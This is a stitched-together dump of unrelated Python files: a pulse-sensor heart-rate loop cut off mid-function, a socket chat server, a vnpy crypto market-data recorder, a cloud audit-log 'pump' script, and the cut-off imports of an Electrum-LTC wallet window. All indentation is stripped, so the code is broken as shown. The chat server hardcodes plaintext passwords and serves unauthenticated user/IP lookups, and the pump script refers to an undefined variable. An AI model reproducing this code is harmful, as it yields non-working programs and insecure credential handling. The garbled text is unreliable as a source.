P = 512 # used to find peak in pulse wave, seeded
T = 512 # used to find trough in pulse wave, seeded
thresh = 500 # used to find instant moment of heart beat, seeded
amp = 100 # used to hold amplitude of pulse waveform, seeded
firstBeat = True # used to seed rate array so we startup with reasonable BPM
secondBeat = False # used to seed rate array so we startup with reasonable BPM
IBI = 600 # int that holds the time interval between beats! Must be seeded!
Pulse = False # "True" when User's live heartbeat is detected. "False" when not a "live beat".
lastTime = int(time.time()*1000)
while not self.thread.stopped:
#Signal = self.adc.read(self.channel)
Signal = self.chan.value
#print(Signal)
currentTime = int(time.time()*1000)
sampleCounter += currentTime - lastTime
lastTime = currentTime
N = sampleCounter - lastBeatTime
# find the peak and trough of the pulse wave
if Signal < thresh and N > (IBI/5.0)*3: # avoid dichrotic noise by waiting 3/5 of last IBI
if Signal < T: # T is the trough
T = Signal # keep track of lowest point in pulse wave
if Signal > thresh and Signal > P:
P = Signal
# signal surges up in value every time there is a pulse
if N > 250: # avoid high frequency noise
if Signal > thresh and Pulse == False and N > (IBI/5.0)*3:
Pulse = True # set the Pulse flag when we think there is a pulse
IBI = sampleCounter - lastBeatTime # measure time between beats in mS
lastBeatTime = sampleCounter # keep track of time for next pulse
if secondBeat: # if this is the second beat, if secondBeat == TRUE
secondBeat = False; # clear secondBeat flag
for i in range(len(rate)): # seed the running total to get a realisitic BPM at startup
rate[i] = IBI
if firstBeat: # if it's the first time we found a beat, if firstBeat == TRUE
firstBeat = False; # clear firstBeat flag
secondBeat = True; # set the second beat flag
continue
# keep a running total of the last 10 IBI values
rate[:-1] = rate[1:] # shift data in the rate array
rate[-1] = IBI # add the latest IBI to the rate array
runningTotal = sum(rate) # add upp oldest IBI values
runningTotal /= len(rate) # average the IBI values
self.BPM = 60000/runningTotal # how many beats can fit into a minute? that's BPM!
if Signal < thresh and Pulse == True: # when the values are going down, the beat is over
Pulse = False # reset the Pulse flag so we can do it again
amp = P - T # get amplitude of the pulse wave
thresh = amp/2 + T # set thresh at 50% of the amplitude
P = thresh # reset these for next time
T = thresh
if N > 2500: # if 2.5 seconds go by without a beat
thresh = 512 # set thresh default
P = 512 # set P default
T = 512 # set T default
lastBeatTime = sampleCounter # bring the lastBeatTime up to date
firstBeat = True # set these to avoid noise
secondBeat = False # when we get the heartbeat back
self.BPM = 0
time.sleep(0.005)
# Start getBPMLoop routine which saves the BPM in its variable
def startAsyncBPM(self):
self.thread = threading.Thread(target=self.getBPMLoop)
self.thread.stopped = False
self.thread.start()
return
# Stop the routine
def stopAsyncBPM(self):
self.thread.stopped = True
self.BPM = 0
return
p = Pulsesensor()
p.startAsyncBPM()
try:
while True:
bpm = p.BPM
if bpm > 0:
print("BPM: %d" % bpm)
else:
print("No Heartbeat found")
time.sleep(1)
except:
p.stopAsyncBPM()
|
server.py | import socket
import threading
from _thread import start_new_thread
username_password_db = {'srinag': 'password', 'shreyas': 'password', 'skitty': 'password', 'yash': '149',
'sanjay': '136'}
username_resolver = {}
ip_resolver = {}
username_conn = {}
call_service_port = 8001
msg_service_port = 8002
run = True
call_processor_sock = None
def auth(username, password):
return username in username_password_db and username_password_db[username] == password
buffer = b''
def read_sock(conn):
global buffer
data = buffer
buffer = b''
while True:
block = conn.recv(10)
end = block.find(b'\n')
if end >= 0:
buffer += block[end + 1:]
data += block[:end + 1]
break
data += block
data = data.decode()
return data.strip()
def call_processor():
global run, call_processor_sock
call_processor_sock = socket.socket()
call_processor_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
call_processor_sock.bind(('', call_service_port))
call_processor_sock.listen(5)
while run:
conn, address = call_processor_sock.accept()
if not run:
break
print('Got connection from', address)
data = read_sock(conn)
print(data)
x = data.split(':')
if x[0] == 'auth':
if auth(x[1], x[2]):
username_resolver[x[1]] = address[0]
ip_resolver[address[0]] = x[1]
conn.send(b'pass\n')
else:
conn.send(b'fail\n')
elif x[0] == 'unauth':
if auth(x[1], x[2]):
username_resolver.pop(x[1], None)
ip_resolver.pop(address[0], None)
elif x[0] == 'unr':
# Check auth
if x[1] in username_resolver:
ip = username_resolver[x[1]]
else:
ip = '-1'
conn.send((':'.join(['unr', x[1], ip]) + '\n').encode('ascii'))
elif x[0] == 'ipr':
# Check auth
if x[1] in ip_resolver:
username = ip_resolver[x[1]]
else:
username = '-1'
conn.send((':'.join(['ipr', x[1], username]) + '\n').encode('ascii'))
conn.close()
call_processor_sock.close()
list_of_clients = []
def client_thread(conn, addr):
global run
username = read_sock(conn)
password = read_sock(conn)
print("Client entered:" + username, password)
if not auth(username, password):
msg = 'Invalid Authentication! Connect Again!\n'
print(msg)
conn.send(msg.encode())
conn.close()
return
else:
list_of_clients.append([username, conn])
print("Client has authenticated on address", addr[0])
msg = "Welcome to this chatroom!"
conn.send(msg.encode())
while run:
try:
message = conn.recv(2048).decode()
if message:
print(message)
if message[:3] == 'pm ':
user = message[3:].split()
message_to_send = 'pm ' + username + ' ' + ' '.join(user[1:]) + '\n'
user = user[0]
if not pm(message_to_send, user):
conn.send("Client not Found!\n".encode())
else:
broadcast('bc ' + username + ' ' + ' '.join(message.split()[1:]), conn)
else:
remove(conn)
except:
continue
client_threads = {}
def msg_listener():
global run
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind(('', msg_service_port))
server.listen(100)
while run:
conn, addr = server.accept()
if not run:
break
print(addr[0] + " connected")
start_new_thread(client_thread, (conn, addr))
def remove(connection):
if connection in list_of_clients:
list_of_clients.remove(connection)
def broadcast(message, connection):
for clients in list_of_clients:
if clients[1] != connection:
try:
clients[1].send(message.encode())
except:
clients[1].close()
remove(clients)
break
def pm(msg, to):
names = [clients[0] for clients in list_of_clients]
if to in names:
tosock = list_of_clients[names.index(to)][1]
try:
tosock.send(msg.encode())
print("Sent!")
return True
except:
tosock.close()
remove(tosock)
else:
return False
def main():
global run, call_processor_sock
call_processor_thread = threading.Thread(target=call_processor)
call_processor_thread.start()
msg_listener_thread = threading.Thread(target=msg_listener)
msg_listener_thread.start()
try:
call_processor_thread.join()
msg_listener_thread.join()
except KeyboardInterrupt:
print('Stopping...')
run = False
term_sock = socket.socket()
term_sock.connect(('', call_service_port))
term_sock.close()
call_processor_thread.join()
term_sock = socket.socket()
term_sock.connect(('', msg_service_port))
term_sock.close()
msg_listener_thread.join()
print('Stopped')
if __name__ == '__main__':
main()
|
runCTADataRecording.py | # encoding: UTF-8
import multiprocessing
from time import sleep
from datetime import datetime, time
from vnpy.event import EventEngine2
from vnpy.trader.vtEvent import EVENT_LOG
from vnpy.trader.vtEngine import MainEngine, LogEngine
from vnpy.trader.gateway import okexGateway
from vnpy.trader.app import dataRecorder
#----------------------------------------------------------------------
def runChildProcess():
"""子进程运行函数"""
print('-'*20)
# 创建日志引擎
le = LogEngine()
le.setLogLevel(le.LEVEL_INFO)
le.addConsoleHandler()
le.info('启动行情记录运行子进程')
ee = EventEngine2()
le.info('事件引擎创建成功')
me = MainEngine(ee)
me.addGateway(okexGateway)
me.addApp(dataRecorder)
le.info('主引擎创建成功')
ee.register(EVENT_LOG, le.processLogEvent)
le.info('注册日志事件监听')
me.connect('OKEX')
le.info('连接OKEX接口')
while True:
sleep(1)
#----------------------------------------------------------------------
def runParentProcess():
"""父进程运行函数,限制交易时间"""
# 创建日志引擎
le = LogEngine()
le.setLogLevel(le.LEVEL_INFO)
le.addConsoleHandler()
le.info('启动行情记录守护父进程')
DAY_START = time(8, 59) # 日盘启动和停止时间1
DAY_END = time(10, 16)
DAY_START2 = time(10, 29) # 日盘启动和停止时间2
DAY_END2 = time(11, 31)
DAY_START3 = time(13, 29) # 日盘启动和停止时间3
DAY_END3 = time(15, 0o1)
NIGHT_START = time(20, 59) # 夜盘启动和停止时间
NIGHT_END = time(23, 31)
p = None # 子进程句柄
while True:
currentTime = datetime.now().time()
recording = True
# 判断当前处于的时间段
# if ((currentTime >= DAY_START and currentTime <= DAY_END) or
# (currentTime >= DAY_START2 and currentTime <= DAY_END2) or
# (currentTime >= DAY_START3 and currentTime <= DAY_END3) or
# (currentTime >= NIGHT_START and currentTime <= NIGHT_END)):
# recording = True
# if datetime.today().weekday() == 5 or datetime.today().weekday() == 6:
# recording = False
# 记录时间则需要启动子进程
if recording and p is None:
le.info('启动子进程')
p = multiprocessing.Process(target=runChildProcess)
p.start()
le.info('子进程启动成功')
# 非记录时间则退出子进程
if not recording and p is not None:
le.info('关闭子进程')
p.terminate()
p.join()
p = None
le.info('子进程关闭成功')
sleep(5)
if __name__ == '__main__':
runParentProcess() |
pump.py | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import colorlog
from datetime import date, datetime, timedelta
import logging
from multiprocessing import Process, Queue
import os
import re
import requests
from six import string_types
import socket
import string
import sys
import time
import xmltodict
import config
from endpoint import Endpoint
__version__ = '17.4.30'
class Pump(object):
"""
Pumps logs from the Managed Cloud Platform (MCP) of Dimension Data
Under Linux, you may want to edit ``~/.bash_profile`` like this::
# credentials to access cloud resources from Dimension Data
export MCP_USER='foo.bar'
export MCP_PASSWORD='WhatsUpDoc'
"""
def __init__(self, settings={}):
"""
Ignites the plumbing engine
:param settings: the parameters for this pump instance
:type settings: ``dict``
:param parameters: the external parameters
:type plan: ``str`` or ``file`` or ``dict``
"""
self.settings = settings
if self.settings.get('debug', False):
logging.basicConfig(format='%(levelname)s:%(message)s', level=logging.DEBUG)
else:
logging.basicConfig(format='%(message)s', level=logging.INFO)
self._userName = None
self._userPassword = None
self.engines = {}
self.dqueues = []
self.mqueues = []
self.updaters = []
self.context = {}
def get_user_name(self):
"""
Retrieves user name to authenticate to the API
:return: the user name to be used with the driver
:rtype: ``str``
:raises: :class:`Exception`
- if no user name can be found
The user name is normally taken
from the environment variable ``MCP_USER``.
Under Linux, you may want to edit ``~/.bash_profile`` like this::
# credentials to access cloud resources from Dimension Data
export MCP_USER='foo.bar'
export MCP_PASSWORD='WhatsUpDoc'
In addition, you can put the value in the configuration file,
like this::
mcp:
MCP_USER: 'foo.bar'
"""
if self._userName is None:
self._userName = self.settings.get('MCP_USER')
if self._userName is None:
self._userName = os.getenv('MCP_USER')
if self._userName is None or len(self._userName) < 3:
raise Exception(
"Missing credentials in environment MCP_USER")
return self._userName
def get_user_password(self):
"""
Retrieves user password to authenticate to the API
:return: the user password to be used with the driver
:rtype: ``str``
:raises: :class:`plumbery.Exception`
- if no user password can be found
The user password is normally
taken from the environment variable ``MCP_PASSWORD``.
Under Linux, you may want to edit ``~/.bash_profile`` like this::
# credentials to access cloud resources from Dimension Data
export MCP_USER='foo.bar'
export MCP_PASSWORD='WhatsUpDoc'
In addition, you can put the value in the configuration file,
like this::
mcp:
MCP_PASSWORD: 'WhatsUpDoc'
"""
if self._userPassword is None:
self._userPassword = self.settings.get('MCP_PASSWORD')
if self._userPassword is None:
self._userPassword = os.getenv('MCP_PASSWORD')
if self._userPassword is None or len(self._userPassword) < 3:
raise Exception(
"Missing credentials in environment MCP_PASSWORD")
return self._userPassword
def get_regions(self):
"""
Retrieves regions to be analysed
:return: the list of regions
:rtype: ``list`` of ``str``
Regions should normally be listed in main configuration::
mcp:
regions: ['dd-af', 'dd-ap', 'dd-au', 'dd-eu', 'dd-na']
"""
return self.settings.get('regions',
('dd-af', 'dd-ap', 'dd-au', 'dd-eu', 'dd-na'))
def set_endpoints(self):
"""
Sets API endpoints
This function initializes one endpoint per region.
"""
self.engines = {}
for region in self.get_regions():
self.engines[region] = Endpoint(
key=self.get_user_name(),
secret=self.get_user_password(),
region=region)
def set_workers(self):
"""
Sets processing workers
This function creates 2 queues per region, one for the processing
of daily data, and another one for the processing of real-time data.
"""
self.dqueues = []
self.mqueues = []
for region in self.get_regions():
self.context[ region ] = {}
q = Queue()
w = Process(target=self.work_every_day, args=(q, region))
w.daemon = True
w.start()
self.dqueues.append(q)
q = Queue()
w = Process(target=self.work_every_minute, args=(q, region))
w.daemon = True
w.start()
self.mqueues.append(q)
def get_date(self, horizon='90d', since=None):
"""
Computes target date
:param horizon: amount of time in the past, e.g., '90d', '3m', '1y'
:type horizon: ``str`` or `None`
:param since: staring date for computation
:type since: ``date`` or `None`
:return: the related date, e.g., date(2016, 11, 30)
:rtype: ``date``
"""
if since is None:
since = date.today()
if horizon.endswith('y'):
years = int(horizon.strip('y'))
target = date(since.year - years, 1, 1)
elif horizon.endswith('m'):
months = int(horizon.strip('m'))
year = since.year - int(months/12)
month = since.month - months%12
while month < 1:
year -= 1
month += 12
target = date(year, month, 1)
elif horizon.endswith('d'):
days = int(horizon.strip('d'))
target = (since - timedelta(days=days))
else:
raise ValueError('Incorrect horizon value')
return target
def pump(self, since=None, forever=True):
"""
Pumps data continuously
:param since: the beginning date, e.g., date(2016, 09, 01)
:type since: ``date`` or `None`
:param forever: loop until Ctrl-C or not
:type forever: `True` or `False`
"""
head = since if since else date.today()
tail = date.today()
while head < tail:
logging.info("Pumping data for {}".format(head))
for queue in self.dqueues:
queue.put(head)
head += timedelta(days=1)
while forever:
if head < tail:
logging.info("Pumping data for {}".format(head))
for queue in self.dqueues:
queue.put(head)
head += timedelta(days=1)
else:
logging.info("Pumping data for one minute")
for queue in self.mqueues:
queue.put(head)
time.sleep(60)
tail = date.today()
def work_every_day(self, queue, region):
"""
Handles data for one day and for one region
:param queue: the list of days to consider
:type queue: `Queue`
:param region: the region to consider
:type region: `str`
This is ran as an independant process, so it works asynchronously
from the rest.
"""
try:
for cursor in iter(queue.get, 'STOP'):
self.pull(cursor, region)
time.sleep(0.5)
except KeyboardInterrupt:
pass
except:
raise
def work_every_minute(self, queue, region):
"""
Handles data for one minute and for one region
:param queue: the minute ticks for a given day
:type queue: `Queue`
:param region: the region to consider
:type region: `str`
This is ran as an independant process, so it works asynchronously
from the rest.
"""
try:
for cursor in iter(queue.get, 'STOP'):
self.tick(cursor, region)
time.sleep(0.5)
except KeyboardInterrupt:
pass
except:
raise
def pull(self, on, region='dd-eu'):
"""
Pulls data for a given region on a given date
:param on: the target day, e.g., date(2016, 11, 30)
:type on: ``date``
:param region: the target region, e.g., 'dd-eu'
:type region: ``str``
"""
try:
items = self.fetch_summary_usage(on, region)
self.update_summary_usage(items, region)
items = self.fetch_detailed_usage(on, region)
self.update_detailed_usage(items, region)
items = self.fetch_audit_log(on, region)
self.update_audit_log(items, region)
except socket.error as feedback:
logging.warning('Cannot access API endpoint for {}'.format(region))
logging.warning('- {}'.format(str(feedback)))
except Exception as feedback:
logging.error('Unable to pull for {}'.format(region))
logging.exception(feedback)
def tick(self, on, region='dd-eu'):
"""
Detects active servers over the past minute for a given region
:param on: the current day, e.g., date(2016, 11, 30)
:type on: ``date``
:param region: the target region, e.g., 'dd-eu'
:type region: ``str``
"""
try:
today = (on + timedelta(days=1))
raw = self.fetch_audit_log(today, region)
items = self.tail_audit_log(today, raw, region)
servers = self.list_active_servers(items, region)
self.on_servers(servers, region)
except socket.error as feedback:
logging.warning('Cannot access API endpoint for {}'.format(region))
logging.warning('- {}'.format(str(feedback)))
except Exception as feedback:
logging.error('Unable to tick for {}'.format(region))
logging.exception(feedback)
def fetch_summary_usage(self, on, region='dd-eu'):
"""
Fetches and returns summary usage
:param on: the target day, e.g., date(2016, 11, 30)
:type on: ``date``
:param region: the target region, e.g., 'dd-eu'
:type region: ``str``
"""
logging.info("Fetching summary usage for {} on {}".format(
region, on.strftime("%Y-%m-%d")))
start_date = (on - timedelta(days=1)).strftime("%Y-%m-%d")
end_date = on.strftime("%Y-%m-%d")
items = self.engines[region].summary_usage_report(
start_date,
end_date)
if len(items) > 0:
first = ','.join(items[0])
if len(first) < 1 or first.startswith(('<!DOCTYPE', '<?xml')):
logging.debug('Data could not be fetched')
logging.debug(items)
items = []
logging.warning("- no item could be found for {} on {}".format(
region, end_date))
else:
items.pop(-1)
logging.debug("- found {} items for {} on {}".format(
len(items), region, end_date))
return items
def fetch_detailed_usage(self, on, region='dd-eu'):
"""
Fetches and returns detailed usage
:param on: the target day, e.g., date(2016, 11, 30)
:type on: ``date``
:param region: the target region, e.g., 'dd-eu'
:type region: ``str``
"""
logging.info("Fetching detailed usage for {} on {}".format(
region, on.strftime("%Y-%m-%d")))
start_date = (on - timedelta(days=1)).strftime("%Y-%m-%d")
end_date = on.strftime("%Y-%m-%d")
items = self.engines[region].detailed_usage_report(
start_date,
end_date)
if len(items) > 0:
first = ','.join(items[0])
if len(first) < 1 or first.startswith(('<!DOCTYPE', '<?xml')):
logging.debug('Data could not be fetched')
logging.debug(items)
items = []
logging.warning("- no item could be found for {} on {}".format(
region, end_date))
else:
items.pop(-1)
logging.debug("- found {} items for {} on {}".format(
len(items), region, end_date))
return items
def fetch_audit_log(self, on, region='dd-eu'):
"""
Fetches and returns audit log records
:param on: the target day, e.g., date(2016, 11, 30)
:type on: ``date``
:param region: the target region, e.g., 'dd-eu'
:type region: ``str``
"""
logging.info("Fetching audit log for {} on {}".format(
region, on.strftime("%Y-%m-%d")))
start_date = (on - timedelta(days=1)).strftime("%Y-%m-%d")
end_date = on.strftime("%Y-%m-%d")
items = self.engines[region].audit_log_report(
start_date,
end_date)
if len(items) > 0:
first = ','.join(items[0])
if len(first) < 1 or first.startswith(('<!DOCTYPE', '<?xml')):
logging.debug('Data could not be fetched')
logging.debug(items)
items = []
logging.warning("- no item could be found for {} on {}".format(
region, end_date))
else:
logging.debug("- found {} items for {} on {}".format(
len(items), region, end_date))
return items
def tail_audit_log(self, on, raw=[], region='dd-eu'):
"""
Considers only new records from the audit log
:param on: the target day, e.g., date(2016, 11, 30)
:type on: ``date``
:param raw: raw records from the audit log
:type raw: `list` of `list`
:param region: the target region, e.g., 'dd-eu'
:type region: ``str``
"""
if raw in ([], None): # sanity check
return []
cursor = self.context[region].get('cursor')
uid = self.context[region].get('uid')
raw.pop(0) # remove headers
if cursor == on and uid is not None:
index = 0
while index < len(raw):
if raw[index][0] == uid:
break
index += 1
if index > 0 and index < len(raw):
del raw[:index+1]
elif len(raw) > 0 and raw[0][0] == uid:
del raw[0]
if len(raw) > 0:
self.context[region]['cursor'] = on
self.context[region]['uid'] = raw[-1][0]
logging.debug("- tail to {} for {}".format(raw[-1][0], region))
logging.debug("- {} new items have been found".format(len(raw)))
else:
logging.debug("- nothing new at {}".format(region))
return raw
def list_active_servers(self, raw=[], region='dd-eu'):
"""
Detects active servers from the audit log
:param raw: raw records from the audit log
:type raw: `list` of `dict`
:param region: the target region, e.g., 'dd-eu'
:type region: ``str``
"""
servers = []
name_and_id = r'(.*)\[(.*)_(.*)\]'
nodes = {}
# process every record from the audit log
#
for item in raw:
# we are interested only into completed actions on servers
#
if item[6] != 'SERVER':
continue
# we are not interested into OEC_SYSTEM
#
if item[2] == 'OEC_SYSTEM':
continue
# we are looking for new servers and for restarted servers
#
if item[8].lower() not in ('deploy server',
'start server',
'graceful shutdown server',
'power off server',
'reboot server'):
continue
# extract name and unique id of the server
#
matches = re.match(name_and_id, item[7])
name = matches.group(1)
id = matches.group(3)
# catch any real-time problem
#
try:
# retrieve node information
#
node = self.engines[region].get_node_by_id(id=id)
if node is None:
continue
# build a record for the updaters
#
server = node.copy()
server['stamp'] = item[1]
actor = string.replace(item[2], '.', ' ')
actor = string.replace(actor, '_', '-')
server['actor'] = actor.title()
server['action'] = item[8]
server['region'] = region
# extend the raw list of activated servers
#
servers.append(server)
# recover safely from any error
#
except Exception as feedback:
logging.debug('Cannot locate {}'.format(name))
logging.exception(feedback)
nodes[id] = None
# list of server updates
#
if len(servers) > 0:
logging.debug('Found server updates for {}'.format(region))
return servers
def add_updater(self, updater):
"""
Adds a new database updater
:param updater: check directory `updaters`
:type updater: ``object``
"""
self.updaters.append(updater)
def open_updaters(self, horizon):
"""
Signals the beginning of the job to updaters
"""
for updater in self.updaters:
try:
if horizon:
updater.reset_store()
else:
updater.use_store()
except Exception as feedback:
logging.error('- unable to open updater')
logging.debug(feedback)
def close_updaters(self):
"""
Signals the end of the job to updaters
"""
for updater in self.updaters:
try:
updater.close_store()
except Exception as feedback:
logging.error('- unable to close updater')
logging.debug(feedback)
def update_summary_usage(self, items, region='dd-eu'):
"""
Saves records of summary usage
:param items: to be recorded in database
:type items: ``list`` of ``dict``
:param region: the target region, e.g., 'dd-eu'
:type region: ``str``
"""
avoided = 0
for updater in self.updaters:
if not updater.get('active', False):
avoided += 1
continue
try:
updater.update_summary_usage(list(items), region)
except IndexError:
logging.error('Invalid index in provided data')
logging.error(items)
if avoided == len(self.updaters) and len(items) > 0:
logging.warning('No updater has been activated')
def update_detailed_usage(self, items, region='dd-eu'):
"""
Saves records of detailed usage
:param items: to be recorded in database
:type items: ``list`` of ``dict``
:param region: the target region, e.g., 'dd-eu'
:type region: ``str``
"""
avoided = 0
for updater in self.updaters:
if not updater.get('active', False):
avoided += 1
continue
try:
updater.update_detailed_usage(list(items), region)
except IndexError:
logging.error('Invalid index in provided data')
logging.error(items)
if avoided == len(self.updaters) and len(items) > 0:
logging.warning('No updater has been activated')
def update_audit_log(self, items, region='dd-eu'):
"""
Saves records of audit log
:param items: to be recorded in database
:type items: ``list`` of ``dict``
:param region: the target region, e.g., 'dd-eu'
:type region: ``str``
"""
avoided = 0
for updater in self.updaters:
if not updater.get('active', False):
avoided += 1
continue
try:
updater.update_audit_log(list(items), region)
except IndexError:
logging.error('Invalid index in provided data')
logging.error(items)
if avoided == len(self.updaters) and len(items) > 0:
logging.warning('No updater has been activated')
def on_servers(self, updates, region='dd-eu'):
"""
Sends updates related to servers
:param updates: to be recorded in database
:type updates: ``list`` of ``dict``
:param region: the target region, e.g., 'dd-eu'
:type region: ``str``
"""
avoided = 0
for updater in self.updaters:
if not updater.get('active', False):
avoided += 1
continue
try:
updater.on_servers(list(updates), region)
except Exception as feedback:
logging.warning('Unable to update on active servers')
logging.exception(feedback)
if avoided == len(self.updaters) and len(items) > 0:
logging.warning('No updater has been activated')
# when the program is launched from the command line
#
if __name__ == "__main__":
# create the pump itself
#
try:
settings = config.pump
except:
settings = {}
pump = Pump(settings)
# logging to console
#
handler = colorlog.StreamHandler()
formatter = colorlog.ColoredFormatter(
"%(asctime)-2s %(log_color)s%(message)s",
datefmt='%H:%M:%S',
reset=True,
log_colors={
'DEBUG': 'cyan',
'INFO': 'green',
'WARNING': 'yellow',
'ERROR': 'red',
'CRITICAL': 'red,bg_white',
},
secondary_log_colors={},
style='%'
)
handler.setFormatter(formatter)
logging.getLogger('').handlers = []
logging.getLogger('').addHandler(handler)
# get args
#
horizon = None
if len(sys.argv) > 1:
horizon = sys.argv[1]
if horizon[-1] not in ('d', 'm', 'y'):
print('usage: pump [<horizon>]')
print('examples:')
print('pump')
print('pump 90d')
print('pump 3m')
print('pump 12m')
print('pump 1y')
sys.exit(1)
horizon = pump.get_date(horizon)
logging.info('Pumping since {}'.format(horizon))
# log data in files as per configuration
#
try:
settings = config.files
from models.files import FilesUpdater
updater = FilesUpdater(settings)
if updater.get('active', False):
logging.info("Storing data in files")
pump.add_updater(updater)
else:
logging.debug("The files module has not been activated")
except AttributeError:
logging.debug("No configuration for file storage")
# add an elasticsearch updater as per configuration
#
try:
settings = config.elastic
from models.elastic import ElasticUpdater
updater = ElasticUpdater(settings)
if updater.get('active', False):
logging.info("Storing data in Elasticsearch")
pump.add_updater(updater)
else:
logging.debug("The Elasticsearch module has not been activated")
except AttributeError:
logging.debug("No configuration for Elasticsearch")
# add an influxdb updater as per configuration
#
try:
settings = config.influxdb
from models.influx import InfluxdbUpdater
updater = InfluxdbUpdater(settings)
if updater.get('active', False):
logging.info("Storing data in InfluxDB")
pump.add_updater(updater)
else:
logging.debug("The InfluxDB module has not been activated")
except AttributeError:
logging.debug("No configuration for InfluxDB")
# add a qualys updater as per configuration
#
try:
settings = config.qualys
from models.qualys import QualysUpdater
updater = QualysUpdater(settings)
if updater.get('active', False):
logging.info("Using Qualys service")
pump.add_updater(updater)
else:
logging.debug("The Qualys module has not been activated")
except AttributeError:
logging.debug("No configuration for Qualys")
# add a Cisco Spark room as per configuration
#
try:
settings = config.spark
from models.spark import SparkUpdater
updater = SparkUpdater(settings)
if updater.get('active', False):
logging.info("Using Cisco Spark service")
pump.add_updater(updater)
else:
logging.debug("The Cisco Spark module has not been activated")
except AttributeError:
logging.debug("No configuration for Cisco Spark")
# sanity check
#
if len(pump.updaters) < 1:
logging.warning('No updater has been activated, check config.py')
# fetch and dispatch data
#
pump.open_updaters(horizon)
try:
pump.set_endpoints()
pump.set_workers()
pump.pump(since=horizon)
except KeyboardInterrupt:
pass
finally:
pump.close_updaters()
|
main_window.py | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QSpinBox, QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit, QTreeWidgetItem,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QMenu, QSizePolicy, QStatusBar)
import electrum_ltc as electrum
from electrum_ltc import (keystore, simple_config, ecc, constants, util, bitcoin, commands,
coinchooser, paymentrequest)
from electrum_ltc.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum_ltc.plugin import run_hook
from electrum_ltc.i18n import _
from electrum_ltc.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, NotEnoughFunds,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword,
base_units, base_units_list, base_unit_name_to_decimal_point,
decimal_point_to_base_unit_name, quantize_feerate,
UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI)
from electrum_ltc.transaction import Transaction, TxOutput
from electrum_ltc.address_synchronizer import AddTransactionException
from electrum_ltc.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption)
from electrum_ltc.version import ELECTRUM_VERSION
from electrum_ltc.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum_ltc.exchange_rate import FxThread
from electrum_ltc.simple_config import SimpleConfig
from electrum_ltc.logging import Logger
from electrum_ltc.paymentrequest import PR_PAID
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, FromList, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton, expiration_values,
ButtonsLineEdit, CopyCloseButton, import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen)
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
